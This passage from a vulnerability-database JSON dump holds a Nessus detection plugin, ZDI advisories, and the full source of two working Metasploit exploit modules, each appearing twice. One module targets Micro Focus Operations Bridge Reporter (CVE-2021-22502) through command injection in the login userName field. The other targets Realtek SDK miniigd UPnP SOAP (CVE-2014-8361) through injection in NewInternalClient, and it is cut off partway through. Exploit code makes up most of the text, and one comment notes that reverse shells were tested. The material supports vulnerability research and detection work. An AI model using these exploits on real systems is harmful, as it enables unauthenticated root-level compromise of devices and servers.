development kit running on the remote device is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the Realtek Software Development Kit is\nrunning on the remote device. It is, therefore, affected by a flaw in\nthe miniigd SOAP service due to a failure to properly sanitize user\ninput when handling NewInternalClient requests. An unauthenticated,\nremote attacker, using a crafted request, can exploit this to execute\narbitrary code with root level privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-15-155/\");\n script_set_attribute(attribute:\"solution\", value:\n\"There is currently no fix available. As a workaround, restrict access\nto vulnerable devices.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Realtek SDK Miniigd UPnP SOAP Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/01\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realtek:realtek_sdk\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"upnp_search.nasl\", \"http_version.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"upnp/server\", \"Services/www\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nglobal_var fix, vuln;\nvuln = FALSE;\n\n##\n# Checks if the given server banner is from a vulnerable\n# version of realtek upnpd. If so, a reporting function is\n# called\n#\n# @param port port number of the service being tested\n# @param server server banner advertised on \"port\"\n# @param proto the protocol the port is accessible by (tcp or udp)\n##\nfunction _check_realtek_version(port, server, proto)\n{\n local_var ver, report, banner;\n server = chomp(server);\n ver = eregmatch(string:server, pattern:\"realtek/v((0(\\.[0-9.]+)?|1\\.[0-3](\\.[0-9.]+)?|1)$)\", icase:TRUE);\n\n if (!isnull(ver))\n {\n vuln = TRUE;\n\n banner = ereg_replace(string:server, pattern:'SERVER: *(.+)', replace:\"\\1\", icase:TRUE);\n report =\n '\\n Server banner : ' + banner +\n '\\n Installed version : ' + ver[1] + '\\n';\n\n security_report_v4(port:port,\n proto:proto,\n severity:SECURITY_HOLE,\n extra:report);\n }\n}\n\n# check the server string retrieved via UDP 1900 by upnp_search.nasl\nservers = get_kb_list('upnp/server');\nforeach(server in servers) _check_realtek_version(port:1900, server:server, proto:'udp');\n\n# check any server strings retrieved via HTTP\nwww_ports = get_kb_list('Services/www');\n\nif(!vuln && isnull(www_ports))\n audit(AUDIT_HOST_NOT, 'affected');\n\nforeach port (www_ports)\n{\n server = http_server_header(port:port);\n if (empty_or_null(server)) continue;\n\n _check_realtek_version(port:port, 
server:server, proto:'tcp');\n}\n\nif (!vuln)\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-19T03:20:07", "description": "This Metasploit module exploits a command injection vulnerability on login that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. It is a straight up command injection, with little escaping required, and it works before authentication. This module has been tested on the Linux 10.40 version.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "zdt", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "1337DAY-ID-36171", "href": "https://0day.today/exploit/description/36171", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank 
= ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits a command injection vulnerability on *login* (yes, you read that right)\n that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below.\n It's a straight up command injection, with little escaping required and it works before\n authentication.\n This module has been tested on the Linux 10.40 version. Older versions might be affected,\n check the advisory for details.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2021-22502'],\n ['ZDI', '21-153'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'],\n ['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947']\n ],\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1024, # This should be a safe value, it might take much more\n 'DisableNops' => true,\n # avoid null char and the injection char (`)\n 'BadChars' => \"\\x00\\x60\",\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n # all of these (and more) should exist in a standard RHEL / SuSE\n # ... 
which are the only two distros supported by Micro Focus OBR\n # (telnet doesn't seem to work though)\n #\n # all reverse shells were tested and work flawlessly\n 'RequiredCmd' => 'netcat openssl generic python'\n }\n },\n 'Targets' =>\n [\n [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-02-09'\n )\n )\n\n register_options(\n [\n # normal (no SSL) port is 21411\n Opt::RPORT(21412),\n OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),\n OptString.new('TARGETURI', [true, 'Application path', '/'])\n ]\n )\n end\n\n def check\n res = send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => rand_text_alpha(10..64)\n }, 10)\n\n if res && res.code == 400 && res.body.include?('Unrecognized token')\n # should return a stack trace like\n # Unrecognized token '#{data}': was expecting ('true', 'false' or 'null')\n # at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...)\n return Exploit::CheckCode::Detected\n end\n\n return Exploit::CheckCode::Unknown\n end\n\n def exploit\n # if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash\n # we have to do this manually, the encoder is not smart enough to do it, and it will\n # fail if we put 0x22 as a bad char above\n payload_enc = payload.encoded.gsub('\"', '\\\\\"')\n\n # we use 0x60 (`) for injection, but there are lots of other possibilities\n data = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\"\n\n send_request_raw({\n 'method' => 'POST',\n 'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'),\n 'headers' => { 'Content-Type' => 'application/json' },\n 'data' => data\n }, 0)\n\n # it's tricky to check the return value of the 
request here\n # - it might hang (no return) and give us a shell\n # - it might return 400 or 500 and give us a shell\n # - it might return 400 or 500 and give us nothing\n # so ignore it altogether and hope for the best\n print_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/36171", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-11T05:23:58", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2015-06-02T00:00:00", "type": "zdt", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8361"], "modified": "2015-06-02T00:00:00", "id": "1337DAY-ID-23686", "href": "https://0day.today/exploit/description/23686", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include REXML\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',\r\n 'Description' => %q{\r\n Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command\r\n injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,\r\n there is no output for the executed command. 
This module has been tested successfully on a\r\n Trendnet TEW-731BR router with emulation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery\r\n 'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8361'],\r\n ['ZDI', '15-155'],\r\n ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],\r\n ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']\r\n ],\r\n 'DisclosureDate' => 'Apr 24 2015',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'MIPS Little Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSLE\r\n }\r\n ],\r\n [ 'MIPS Big Endian',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPSBE\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOUR')\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(52869) # port of UPnP SOAP webinterface\r\n ], self.class)\r\n end\r\n \r\n def check\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => '/picsdesc.xml'\r\n })\r\n if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/\r\n return Exploit::CheckCode::Detected\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n \r\n Exploit::CheckCode::Unknown\r\n end\r\n \r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n \r\n unless check == Exploit::CheckCode::Detected\r\n fail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n \r\n print_status(\"#{peer} - Exploiting...\")\r\n \r\n execute_cmdstager(\r\n :flavour => :echo,\r\n :linemax => 50,\r\n :nodelete => true\r\n )\r\n end\r\n \r\n def execute_command(cmd, opts)\r\n uri = '/wanipcn.xml'\r\n 
soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'\r\n data_cmd = '<?xml version=\"1.0\"?>' + build_soap_req\r\n \r\n begin\r\n res = send_request_cgi({\r\n 'uri' => uri,\r\n 'vars_get' => {\r\n 'service' => 'WANIPConn1'\r\n },\r\n 'ctype' => 'text/xml',\r\n 'method' => 'POST',\r\n 'headers' => {\r\n 'SOAPAction' => soap_action\r\n },\r\n 'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\")\r\n })\r\n return res\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n \r\n def build_soap_req\r\n new_external_port = rand(32767) + 32768\r\n new_internal_port = rand(32767) + 32768\r\n \r\n xml = Document.new\r\n \r\n xml.add_element(\r\n 'SOAP-ENV:Envelope',\r\n {\r\n 'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',\r\n 'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'\r\n })\r\n \r\n xml.root.add_element('SOAP-ENV:Body')\r\n \r\n body = xml.root.elements[1]\r\n \r\n body.add_element(\r\n 'm:AddPortMapping',\r\n {\r\n 'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'\r\n })\r\n \r\n port_mapping = body.elements[1]\r\n port_mapping.add_element('NewLeaseDuration')\r\n port_mapping.add_element('NewInternalClient')\r\n port_mapping.add_element('NewEnabled')\r\n port_mapping.add_element('NewExternalPort')\r\n port_mapping.add_element('NewRemoteHost')\r\n port_mapping.add_element('NewProtocol')\r\n port_mapping.add_element('NewInternalPort')\r\n \r\n port_mapping.elements['NewLeaseDuration'].text = ''\r\n port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'\r\n port_mapping.elements['NewEnabled'].text = '1'\r\n port_mapping.elements['NewExternalPort'].text = \"#{new_external_port}\"\r\n port_mapping.elements['NewRemoteHost'].text = ''\r\n port_mapping.elements['NewProtocol'].text = 'TCP'\r\n port_mapping.elements['NewInternalPort'].text = \"#{new_internal_port}\"\r\n \r\n 
xml.to_s\r\n end\r\n \r\nend\n\n# 0day.today [2018-01-11] #", "sourceHref": "https://0day.today/exploit/23686", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2022-01-31T22:28:05", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the userName parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter userName Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-02-09T00:00:00", "id": "ZDI-21-153", 
"href": "https://www.zerodayinitiative.com/advisories/ZDI-21-153/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:28:04", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Micro Focus Operations Bridge Reporter. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Token parameter provided to the LogonResource endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "zdi", "title": "Micro Focus Operations Bridge Reporter Token Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-06-29T00:00:00", "id": "ZDI-21-154", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-154/", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:14:24", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Realtek SDK. Authentication is not required to exploit this vulnerability. The specific flaw exists within the miniigd SOAP service. The issue lies in the handling of the NewInternalClient requests due to a failure to sanitize user data before executing a system call. An attacker could leverage this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2015-04-24T00:00:00", "type": "zdi", "title": "(0Day) Realtek SDK miniigd AddPortMapping SOAP Action Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2015-04-24T00:00:00", "id": "ZDI-15-155", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-155/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-04-30T15:30:58", "description": "", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "packetstorm", "title": "Micro Focus Operations Bridge Reporter Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-30T00:00:00", "id": "PACKETSTORM:162408", "href": "https://packetstormsecurity.com/files/162408/Micro-Focus-Operations-Bridge-Reporter-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module 
requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Micro Focus Operations Bridge Reporter Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits a command injection vulnerability on *login* (yes, you read that right) \nthat affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. \nIt's a straight up command injection, with little escaping required and it works before \nauthentication. \nThis module has been tested on the Linux 10.40 version. Older versions might be affected, \ncheck the advisory for details. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2021-22502'], \n['ZDI', '21-153'], \n['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md'], \n['URL', 'https://softwaresupport.softwaregrp.com/doc/KM03775947'] \n], \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1024, # This should be a safe value, it might take much more \n'DisableNops' => true, \n# avoid null char and the injection char (`) \n'BadChars' => \"\\x00\\x60\", \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n# all of these (and more) should exist in a standard RHEL / SuSE \n# ... 
which are the only two distros supported by Micro Focus OBR \n# (telnet doesn't seem to work though) \n# \n# all reverse shells were tested and work flawlessly \n'RequiredCmd' => 'netcat openssl generic python' \n} \n}, \n'Targets' => \n[ \n[ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-02-09' \n) \n) \n \nregister_options( \n[ \n# normal (no SSL) port is 21411 \nOpt::RPORT(21412), \nOptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]), \nOptString.new('TARGETURI', [true, 'Application path', '/']) \n] \n) \nend \n \ndef check \nres = send_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => rand_text_alpha(10..64) \n}, 10) \n \nif res && res.code == 400 && res.body.include?('Unrecognized token') \n# should return a stack trace like \n# Unrecognized token '#{data}': was expecting ('true', 'false' or 'null') \n# at [Source: org.glassfish.jersey.message.internal.ReaderInterceptorExecutor$UnC (...) 
\nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Unknown \nend \n \ndef exploit \n# if there are any 0x22 (\") chars in the encoded payload, escape them with a backslash \n# we have to do this manually, the encoder is not smart enough to do it, and it will \n# fail if we put 0x22 as a bad char above \npayload_enc = payload.encoded.gsub('\"', '\\\\\"') \n \n# we use 0x60 (`) for injection, but there are lots of other possibilities \ndata = \"{\\\"userName\\\":\\\"#{rand_text_alpha(1..16)}`#{payload_enc}`\\\",\\\"credential\\\":\\\"#{rand_text_alpha(8..20)}\\\"}\" \n \nsend_request_raw({ \n'method' => 'POST', \n'uri' => normalize_uri(datastore['TARGETURI'], '/AdminService/urest/v1/LogonResource'), \n'headers' => { 'Content-Type' => 'application/json' }, \n'data' => data \n}, 0) \n \n# it's tricky to check the return value of the request here \n# - it might hang (no return) and give us a shell \n# - it might return 400 or 500 and give us a shell \n# - it might return 400 or 500 and give us nothing \n# so ignore it altogether and hope for the best \nprint_status(\"#{peer} - Payload sent, now wait for Shelly, if she doesn't arrive try again!\") \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162408/microfocus_obr_cmd_injection.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-12-05T22:11:29", "description": "", "cvss3": {}, "published": "2015-05-29T00:00:00", "type": "packetstorm", "title": "Realtek SDK Miniigd UPnP SOAP Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-8361"], "modified": "2015-05-29T00:00:00", "id": "PACKETSTORM:132090", "href": "https://packetstormsecurity.com/files/132090/Realtek-SDK-Miniigd-UPnP-SOAP-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n 
\nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude REXML \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution', \n'Description' => %q{ \nDifferent devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command \ninjection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, \nthere is no output for the executed command. This module has been tested successfully on a \nTrendnet TEW-731BR router with emulation. \n}, \n'Author' => \n[ \n'Ricky \"HeadlessZeke\" Lawshae', # Vulnerability discovery \n'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2014-8361'], \n['ZDI', '15-155'], \n['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'], \n['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055'] \n], \n'DisclosureDate' => 'Apr 24 2015', \n'Privileged' => true, \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Targets' => \n[ \n[ 'MIPS Little Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSLE \n} \n], \n[ 'MIPS Big Endian', \n{ \n'Platform' => 'linux', \n'Arch' => ARCH_MIPSBE \n} \n] \n], \n'DefaultTarget' => 0 \n)) \n \nderegister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR') \n \nregister_options( \n[ \nOpt::RPORT(52869) # port of UPnP SOAP webinterface \n], self.class) \nend \n \ndef check \nbegin \nres = send_request_cgi({ \n'uri' => '/picsdesc.xml' \n}) \nif res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\\/1.0 UPnP\\/1.0/ \nreturn Exploit::CheckCode::Detected \nend \nrescue ::Rex::ConnectionError \nreturn Exploit::CheckCode::Unknown \nend \n \nExploit::CheckCode::Unknown \nend \n \ndef exploit \nprint_status(\"#{peer} - 
Trying to access the device ...\") \n \nunless check == Exploit::CheckCode::Detected \nfail_with(Failure::Unknown, \"#{peer} - Failed to access the vulnerable device\") \nend \n \nprint_status(\"#{peer} - Exploiting...\") \n \nexecute_cmdstager( \n:flavor => :echo, \n:linemax => 50, \n:nodelete => true \n) \nend \n \ndef execute_command(cmd, opts) \nuri = '/wanipcn.xml' \nsoap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping' \ndata_cmd = '<?xml version=\"1.0\"?>' + build_soap_req \n \nbegin \nres = send_request_cgi({ \n'uri' => uri, \n'vars_get' => { \n'service' => 'WANIPConn1' \n}, \n'ctype' => 'text/xml', \n'method' => 'POST', \n'headers' => { \n'SOAPAction' => soap_action \n}, \n'data' => data_cmd.gsub(/CMD_HERE/, \"`#{cmd.gsub(/\\\\/, '\\\\\\\\\\\\\\\\\\\\')}`\") \n}) \nreturn res \nrescue ::Rex::ConnectionError \nfail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\") \nend \nend \n \ndef build_soap_req \nnew_external_port = rand(32767) + 32768 \nnew_internal_port = rand(32767) + 32768 \n \nxml = Document.new \n \nxml.add_element( \n'SOAP-ENV:Envelope', \n{ \n'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/', \n'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/' \n}) \n \nxml.root.add_element('SOAP-ENV:Body') \n \nbody = xml.root.elements[1] \n \nbody.add_element( \n'm:AddPortMapping', \n{ \n'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1' \n}) \n \nport_mapping = body.elements[1] \nport_mapping.add_element('NewLeaseDuration') \nport_mapping.add_element('NewInternalClient') \nport_mapping.add_element('NewEnabled') \nport_mapping.add_element('NewExternalPort') \nport_mapping.add_element('NewRemoteHost') \nport_mapping.add_element('NewProtocol') \nport_mapping.add_element('NewInternalPort') \n \nport_mapping.elements['NewLeaseDuration'].text = '' \nport_mapping.elements['NewInternalClient'].text = 'CMD_HERE' \nport_mapping.elements['NewEnabled'].text = '1' 
